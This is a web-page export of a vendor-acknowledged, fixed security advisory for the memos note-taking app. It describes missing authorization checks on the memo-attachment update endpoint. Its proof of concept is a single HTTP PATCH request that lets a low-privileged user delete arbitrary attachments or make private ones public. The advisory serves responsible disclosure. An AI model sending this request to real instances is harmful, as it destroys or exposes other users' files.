{"id":24630,"date":"2025-12-05T12:51:41","date_gmt":"2025-12-05T11:51:41","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=24630"},"modified":"2025-12-10T14:48:02","modified_gmt":"2025-12-10T13:48:02","slug":"usd-2025-0059","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0059\/","title":{"rendered":"usd-2025-0059"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2025-59 | Broken Access Control in Memo Attachments<\/h1>\n

<\/h1>\n

Product<\/strong>: memos
Affected Version<\/strong>: v0.25.2
Vulnerability Type<\/strong>: CWE-862: Missing Authorization
Security Risk<\/strong>: Medium
Vendor<\/strong>: usememos
Vendor URL<\/strong>: https:\/\/github.com\/usememos\/memos<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2025-65798
CVE Link<\/strong>: https:\/\/www.cve.org\/CVERecord?id=CVE-2025-65798<\/a>
Advisory ID<\/strong>: usd-2025-59<\/p>\n

Description<\/h3>\n

Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth\/SSO integration, activity logging, and internationalization.<\/p>\n

When updating which attachments are assigned to a Memo, neither the creator of the Memo nor the creator of the attachment are validated. An authenticated, low-privileged attacker can use this vulnerability to delete arbitrary attachments or make private attachments public.<\/p>\n

Proof of Concept<\/h3>\n

The following HTTP request can be used by low-privileged users with arbitrary Memo and attachment IDs. Note that only IDs of public Memos and Attachments are attached to public Memos are discoverable.<\/p>\n

\n
<\/span>PATCH<\/span> \/api\/v1\/memos\/ff6FyXzix9d8QyUQGvig3Q\/attachments<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> memos:5230<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\nCookie<\/span>:<\/span> user_session=3-3a[... REDACTED ...]79<\/span>\nContent-Length<\/span>:<\/span> 133<\/span>\n\n{<\/span>\n    <\/span>\"name\"<\/span>:<\/span> <\/span>\"memos\/ff6FyXzix9d8QyUQGvig3Q\"<\/span>,<\/span>\n    <\/span>\"attachments\"<\/span>:<\/span> <\/span>[<\/span>\n        <\/span>{<\/span>\n            <\/span>\"name\"<\/span>:<\/span> <\/span>\"attachments\/QLjAxtsxnHTigoQYsaixSv\"<\/span>\n        <\/span>}<\/span>\n    <\/span>]<\/span>\n}<\/span>\n<\/pre>\n<\/div>\n
If the attachments<\/strong> list is empty, arbitrary attachments can be removed. Note that these are also deleted from disk when they are unassigned from a Memo.<\/p>\n
In a different scenario, if an attacker discovers an inaccessible attachment ID, they can assign the Attachment to a public Memo, making the previously inaccessible Attachment public.<\/p>\n
Fix<\/h3>\n
Fixes for all mentioned vulnerabilities have been submitted as pull request<\/a>.<\/p>\n
References<\/h3>\n